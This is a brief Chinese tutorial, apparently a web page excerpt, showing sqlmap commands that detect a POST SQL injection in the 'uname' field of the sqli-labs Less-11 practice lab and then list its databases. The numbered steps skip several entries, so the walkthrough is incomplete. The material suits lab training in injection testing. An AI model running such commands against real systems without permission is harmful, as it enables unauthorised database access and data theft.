使用sqlmap进行注入检测
1、以sqli-labs第十一关关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第十一关系统正常运行如下。
4、浏览器username输入123,password输入123,点击submit。
6、使用sqlmap进行注入检测python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-11/" --method POST --data "uname=1&passwd=123456"-p uname 检测出含有uname(POST)注入。
8、获取数据库中所有的库python2 sqlmap.py -r post.txt --dbs获取到7个库
声明:本网站引用、摘录或转载内容仅供网站访问者交流或参考,不代表本站立场,如存在版权或非法内容,请联系站长删除,联系邮箱:site.kefu@qq.com。
阅读量:24
阅读量:95
阅读量:34
阅读量:89
阅读量:53